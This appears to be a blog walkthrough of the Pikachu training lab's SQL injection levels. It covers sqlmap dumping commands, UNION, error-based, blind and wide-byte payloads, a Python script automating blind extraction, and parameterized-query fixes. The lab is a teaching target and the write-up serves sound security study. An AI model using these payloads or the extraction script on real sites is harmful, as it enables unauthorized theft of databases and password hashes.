Pikachu ----- SQL Inject (SQL injection)

Table of contents

One, SQL injection

1. Introduction

Two, sqlmap

1. Introduction

Three, breaking through the levels

1. Numeric injection (POST)

2. Character injection (GET)

3. Search injection

4. xx-type injection

5. insert/update injection

6. delete injection

7. HTTP header injection

8. Blind injection (based on Boolean)

9. Blind injection (based on time)

10. Wide-byte injection


One, SQL injection

1. Introduction

Official introduction

The root cause of SQL injection is that when data sent from the front end is passed to the back end for processing, it is not strictly validated, so the incoming "data" is spliced into a SQL statement and executed as part of that statement. The consequences range from the database being compromised (dumped or deleted) to the whole server being taken over.

When writing code, the following strategies are generally used to prevent SQL injection:
1. Filter the variables that go into the SQL statement and reject dangerous characters;
2. Use parameterized queries (Parameterized Query / Parameterized Statement);
3. Many ORM frameworks now use parameterization automatically, but they also expose "raw" or string-splicing methods, so be careful when using those.
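To make the difference between "splicing" and "parameterization" concrete, here is an added example that is not part of the original article. It uses Python's built-in sqlite3 with a constructed `users` table (placeholder hashes) as a stand-in for the lab's MySQL database; the two vulnerable functions mirror the numeric and character-type pages of the lab, the two safe ones bind the value as a parameter.

```python
import sqlite3

# Constructed sample table standing in for the lab's `users`; hashes are placeholders.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "hash_a"), (2, "kobe", "hash_b")])
    return conn

def by_id_spliced(conn, user_id):
    """Vulnerable: the request value becomes part of the SQL text (numeric injection)."""
    sql = "SELECT username FROM users WHERE id = " + user_id
    return [row[0] for row in conn.execute(sql)]

def by_id_parameterized(conn, user_id):
    """Safe: the value is bound as a parameter, so it is compared as data, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]

def by_name_spliced(conn, name):
    """Vulnerable: a quote inside the input closes the string literal (character injection)."""
    sql = "SELECT username FROM users WHERE username = '%s'" % name
    return [row[0] for row in conn.execute(sql)]

def by_name_parameterized(conn, name):
    """Safe: the quote is just a character of the bound value."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (name,))]

if __name__ == "__main__":
    db = make_db()
    print(by_id_spliced(db, "1 or 1=1"))            # every user comes back
    print(by_id_parameterized(db, "1 or 1=1"))      # nothing: no id equals that text
    print(by_name_spliced(db, "kobe' or '1'='1"))   # every user comes back
    print(by_name_parameterized(db, "kobe' or '1'='1"))
```

The same `1 or 1=1` string returns every row through the spliced query and nothing through the bound one; with the parameter the database looks for an id equal to the literal text, which no row has.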

Two, sqlmap

1. Introduction

sqlmap is an automated tool for detecting and exploiting SQL injection.

--batch: never ask for user input; sqlmap answers every prompt with its own default and keeps running.

--technique: choose the injection technique(s) to test, e.g. B for Boolean-based blind (the other letters are E error-based, U UNION query, S stacked queries, T time-based blind, Q inline queries).

--threads 10: use 10 concurrent requests, which makes blind injection noticeably faster.

(1) Specify the target
Use the parameter -u or --url to specify a URL as the target; the string that follows is the URL, and it may include a port.

(2) GET type

* Check the injection point
sqlmap.py -u URL
* Dump the current database and all databases
sqlmap.py -u URL --current-db --dbs
* Dump tables
sqlmap.py -u URL -D database_name --tables
* Dump columns
sqlmap.py -u URL -D database_name -T table_name --columns
* Dump values
sqlmap.py -u URL -D database_name -T table_name -C column_name --dump


(3) POST type

* Scan the injection type (the request captured with Burp is saved to post.txt and passed with -r)
python sqlmap.py -r "D:\post.txt"
* Dump all databases
python sqlmap.py -r "D:\post.txt" --dbs
* Dump tables
python sqlmap.py -r "D:\post.txt" -D database_name --tables
* Dump columns
python sqlmap.py -r "D:\post.txt" -D database_name -T table_name --columns
* Dump values
python sqlmap.py -r "D:\post.txt" -D database_name -T table_name -C column_name --dump
 

Three, breaking through the levels

1. Numeric injection (POST)

Entering the level, the query box offers six numbers to choose from.

Query 1; the result comes back as shown below and the URL does not change, because the form is submitted with POST.

Capture the request with Burp Suite.

Use a single quote ' to test for an injection point.

id=1 and 1=2: the echo is wrong (no result)

id=1 and 1=1: the echo is normal. The two responses differ, so there is an injection point, and since no quotes are needed to reach the SQL, numeric injection is confirmed.

1.1 Guess the number of columns

order by x (x is a number)

id=1 order by 2

order by 3 reports an error, so the query has two columns.

1.2 Query the database

id=1 union select database(),2#

The previous step showed two columns, so the UNION must also select two.

The database is found to be pikachu.

id=1 union select database(),version()#

1.3 Get the table names

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#

1.4 Get the column names

id=1 union select group_concat(column_name),2 from information_schema.columns where table_name='users'#

1.5 Query the column values

id=1 union select username,password from users#

The passwords are stored as MD5 hashes; https://www.cmd5.com/ can be used to look them up.

2. Character injection (GET)

With GET, the input is shown in the URL.

2.1 Judging the injection type

Enter a name that exists in the database, such as kobe.

Appending a single quote (kobe') makes the query error, so this is character-type injection: the input is wrapped in quotes that have to be closed.

 

2.2 Judging the number of columns

kobe' order by 2#

kobe' order by 3#

The second one errors, so the number of columns is 2.

2.3 Judging the display positions

kobe' union select 1,2#

Both position 1 and position 2 are echoed correctly, so either slot of the UNION can be used to display data.

2.4 Dump the databases

1' union select 1,group_concat(schema_name) from (information_schema.schemata) #   all databases
1' union select 1,database() #   current database

All databases:

Current database:

2.5 Dump the tables

1' union select 1,group_concat(table_name) from (information_schema.tables) where table_schema='pikachu' #   tables of the pikachu database

2.6 Dump the columns

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='table_name' #   a given table in the current database
1' union select 1,group_concat(column_name) from (information_schema.columns) where table_name='table_name' #   a table name matched across all databases

2.7 Dump the data

1' union select username,password from users#

3. Search injection

A search box usually queries with '%keyword%', but first make sure the search actually hits the database rather than being filtered inside the page.

select username,id,email from member where username like '%$name%';

After the payload kobe%' and 1=1 # is inserted:
select username,id,email from member where username like '%kobe%' and 1=1 #';

4. xx-type injection

"xx-type" injection means the input value may be wrapped by various symbols (single quotes, double quotes, parentheses, and so on), and the payload has to close them first.

"select id,email from member where username=('$name')";

payload:

aaa') union select 'aaa',group_concat(concat_ws(':',username,password)) from pikachu.users#

5. insert/update injection

insert injection: the information we fill in on the registration page is written to the database by the back end with an INSERT statement. If the back end does not guard that input against SQL injection, we can splice SQL into the registration fields.

Capture the request with Burp Suite.

Use error-based injection.

extractvalue() or updatexml() can be used for error-based injection.

EXTRACTVALUE(XML_document, XPath_string)
First parameter: XML_document, a string holding the XML document.
Second parameter: XPath_string, an XPath expression.
Function: returns the text selected by the XPath from the XML document.
It can be used for injection because when the XPath is not syntactically valid, MySQL raises "XPATH syntax error: '...'" with the offending string inside it, so the value to be queried is placed in the XPath and read back from the error message. (MySQL only returns the first 32 characters of that string, so long values have to be fetched in pieces with substr().)

Payload analysis: the single quote after 1 closes the quote in front of the inserted value; the last single quote in the payload pairs with the quote that follows the value; the pieces are joined with or/and. extractvalue() takes two parameters: the first can be anything, the second is what matters. concat() joins its arguments into one string, and 0x7e is the hex code of ~, which is not valid XPath, so it guarantees the error and marks where the leaked value starts and ends.

Just replace the statement after select with whatever needs to be queried.

payload:1' or extractvalue(1, concat(0x7e,(select database()),0x7e)) or '
payload:1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '

Similarly, after logging in (the update part of this level), error-based injection can be used in the same way.

payload:1' or updatexml(1,concat(0x7e,database(),0x7e),1) or '

6. delete injection

Injection in the delete interface: write a message, click delete, and capture the request.

id=99+or+updatexml(1,concat(0x7e,database()),1)   # query the database name
id=99+or+updatexml(1,concat(0x7e,version()),0)    # query the database version

7. HTTP header injection

Besides the request parameters, the HTTP headers may also be injectable.
First, the login password must be correct; after logging in it can be seen that the client IP, User-Agent and HTTP Accept header are all recorded in the database.

Use error-based injection in the User-Agent header.

8. Blind injection (based on Boolean)

In some cases the back end suppresses error messages, so the injection cannot be judged from error output.

Injection in this situation is called "blind injection": we can only tell whether the injected SQL executed by whether the page looks normal. In fact, many websites are of this blind type.

kobe' and 1=1#   page normal
kobe' and 1=2#   page abnormal

Boolean blind injection needs a dichotomy (binary search) and some MySQL functions such as mid(), ascii() and length().

ascii(): returns the ASCII code of the leftmost character; returns 0 for an empty string and NULL for NULL.

length(): returns the length of the string in bytes.

For example, to dump the database name, first find its length, then dump the name one character at a time.

kobe' and length(database())>10 #   ==>   page abnormal
kobe' and length(database())>5 #    ==>   page normal
kobe' and length(database())>8 #    ==>   page abnormal
kobe' and length(database())>6 #    ==>   page normal
kobe' and length(database())=7 #    ==>   page normal

Next comes each character (like running a for loop over the positions):

first character:

kobe' and ascii(mid(database(),1,1))>115 #  ==> page abnormal
kobe' and ascii(mid(database(),1,1))>110 #  ==> page normal
kobe' and ascii(mid(database(),1,1))>112 #  ==> page abnormal
kobe' and ascii(mid(database(),1,1))=112 #  ==> page normal

The ASCII code of the first character is 112, which is the letter p.

The remaining characters are dumped the same way: pikachu

  •     Number of tables in the current database
kobe' and (select count(table_name) from information_schema.tables where table_schema=database())>5 #  ==>  page abnormal
kobe' and (select count(table_name) from information_schema.tables where table_schema=database())=5 #  ==>  page normal

There are 5 tables.

  •     Length of the first table name
kobe' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=8 #  ==>  page normal
  •     Each character of the first table name
kobe' and ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104 #  ==>  page normal

The first character of the first table is h (ASCII 104); continuing position by position, the first table is httpinfo.

  •     Number of columns in a given table

To get the number of columns of the users table:

kobe' and (select count(column_name) from information_schema.columns where
 table_schema=database() and table_name='users')=4 #

users has 4 columns.

  •     Length of the first column name
kobe' and length((select column_name from information_schema.columns where
 table_schema=database() and table_name='users' limit 0,1))=2 #
  •     Each character of the first column name
kobe' and ascii(mid((select column_name from information_schema.columns where
 table_schema=database() and table_name='users' limit 0,1),1,1))=105 #

Following this idea, the entire database can be dumped.
By hand it is tedious and impractical, so only the idea is shown here; in practice the loop is automated.

9. Blind injection (based on time)

With Boolean blind injection the page still differs visibly, so we can tell whether the injected SQL ran. With time-based injection there is no visible difference at all.

The only signal is the response time: sleep() is executed or not depending on whether a Boolean condition is true, which delays the page.

kobe' and sleep(5) #   delayed 5 seconds

There is a noticeable delay, which indicates time-based injection.

If the database name length is not greater than 7, delay 9 seconds:

kobe' and sleep(if(length(database())>7,0,9)) #  ==> delayed

If the database name length equals 7, do not delay:

kobe' and sleep(if(length(database())=7,0,3)) #  ==> no delay
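Sections 8 and 9 describe the same extraction loop with two different oracles, so here is the automated version as an added example that is not part of the original article. The target is a constructed in-memory SQLite database whose table names mirror the ones the walkthrough enumerates; SQLite stands in for MySQL, which means `unicode(substr())` replaces `ascii(mid())`, `CASE WHEN` replaces `if()`, `-- ` replaces `#`, and a `sleep()` function has to be registered by hand because SQLite has none. The binary search asks only "greater than" questions, exactly as in the payloads above, and the request counter shows what a full table name costs.

```python
import sqlite3
import time

# Constructed in-memory stand-in for the lab database; table names mirror the
# ones the walkthrough finds (httpinfo, member, message, users, xssblind).
SETUP = """
CREATE TABLE httpinfo(id INTEGER, userip TEXT, useragent TEXT);
CREATE TABLE member(id INTEGER, username TEXT, pw TEXT, email TEXT);
CREATE TABLE message(id INTEGER, content TEXT);
CREATE TABLE users(id INTEGER, username TEXT, password TEXT, level INTEGER);
CREATE TABLE xssblind(id INTEGER, content TEXT);
INSERT INTO member VALUES (1, 'kobe', 'hash', 'kobe@pikachu.com');
"""
DELAY = 0.1   # seconds the injected sleep() pauses when the condition is true

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SETUP)
    # SQLite has no sleep(); register one so the time-based variant works too.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    return conn

def vulnerable_lookup(conn, name):
    """Same shape as the lab's character-type query: the name is spliced in."""
    sql = "SELECT id, email FROM member WHERE username='%s'" % name
    return conn.execute(sql).fetchall()

def boolean_oracle(conn, condition):
    """Boolean blind: the page is 'normal' when kobe's row still comes back."""
    return len(vulnerable_lookup(conn, "kobe' AND (%s) -- " % condition)) > 0

def time_oracle(conn, condition):
    """Time blind: nothing visible changes, only the response time does."""
    payload = "kobe' AND sleep(CASE WHEN (%s) THEN %s ELSE 0 END) -- " % (condition, DELAY)
    start = time.monotonic()
    vulnerable_lookup(conn, payload)
    return time.monotonic() - start >= DELAY / 2

def binary_search(oracle, expr, lo, hi):
    """Dichotomy: pin down the integer value of SQL expression `expr` in [lo, hi]
    using only 'expr > mid' questions, as the walkthrough does by hand."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("%s > %d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract_string(oracle, subquery, max_len=64):
    """Length first, then every character; unicode(substr()) is SQLite's ascii(mid())."""
    length = binary_search(oracle, "length(%s)" % subquery, 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = binary_search(oracle, "unicode(substr(%s,%d,1))" % (subquery, i), 0, 127)
        chars.append(chr(code))
    return "".join(chars)

# SQLite's catalog; the MySQL equivalents are the information_schema subqueries above.
FIRST_TABLE = "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1)"
TABLE_COUNT = "(SELECT count(*) FROM sqlite_master WHERE type='table')"

def enumerate_blind(conn, oracle=boolean_oracle):
    """Returns (table count, first table name, number of requests it cost)."""
    calls = [0]
    def ask(condition):
        calls[0] += 1
        return oracle(conn, condition)
    count = binary_search(ask, TABLE_COUNT, 0, 64)
    first = extract_string(ask, FIRST_TABLE)
    return count, first, calls[0]

if __name__ == "__main__":
    db = make_db()
    print(enumerate_blind(db))   # Boolean oracle: about 70 requests for 5 and 'httpinfo'
    # Time oracle: same search, each true answer costs DELAY seconds of waiting.
    print(binary_search(lambda c: time_oracle(db, c), "length(%s)" % FIRST_TABLE, 0, 16))
```

Seven requests per character is the price of a pure binary search over ASCII; the time-based oracle pays the same number of requests plus one sleep per true answer, which is why real tooling keeps the delay short and retries on jitter.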

10. Wide-byte injection

Real websites escape many special characters to stop them from polluting the SQL statement.

When a single quote is escaped to \' and the SQL can no longer be closed, wide-byte injection can be tried.

With a GBK connection, %df followed by the escaping backslash \ (0x5c) is decoded as one two-byte character, so the single quote that follows is no longer escaped and the statement can be closed again.
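The byte-level mechanics are easy to check without a database, so here is an added example that is not part of the original article: a minimal re-implementation of PHP-style addslashes() escaping followed by decoding the escaped bytes the way a GBK (or, for contrast, UTF-8) connection would. The payload bytes are constructed; the decoding is Python's own GBK codec.

```python
def addslashes(data: bytes) -> bytes:
    """Byte-level escaping like PHP addslashes()/mysql_escape_string: a backslash
    is put in front of ' " \\ and NUL. It does not know about multibyte charsets."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5c, 0x00):
            out.append(0x5c)
        out.append(b)
    return bytes(out)

def as_seen_by_mysql(raw: bytes, charset: str) -> str:
    """Escape the raw request bytes, then decode them as a connection in `charset` would."""
    return addslashes(raw).decode(charset, errors="replace")

def quote_is_live(fragment: str) -> bool:
    """True if some single quote in the decoded text is not preceded by a backslash,
    i.e. it still terminates the string literal in the SQL statement."""
    return any(c == "'" and (i == 0 or fragment[i - 1] != "\\")
               for i, c in enumerate(fragment))

# Constructed payload: what kobe%df' or 1=1 %23 looks like after URL decoding.
PAYLOAD = b"kobe\xdf' or 1=1 #"

if __name__ == "__main__":
    for charset in ("gbk", "utf-8"):
        seen = as_seen_by_mysql(PAYLOAD, charset)
        print(charset, repr(seen), "quote live:", quote_is_live(seen))
```

Under GBK the bytes 0xDF 0x5C form one valid two-byte character, so the backslash that addslashes() inserted is swallowed and the quote is live again; under UTF-8 the lone 0xDF is an invalid sequence, the backslash survives as a separate character, and the quote stays escaped. The fix on the server side is to set the connection charset properly (mysql_set_charset / SET NAMES matching the real encoding) and, better, to use parameterized queries so escaping is not relied on at all.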


Source: blog.csdn.net/m0_65712192/article/details/128395604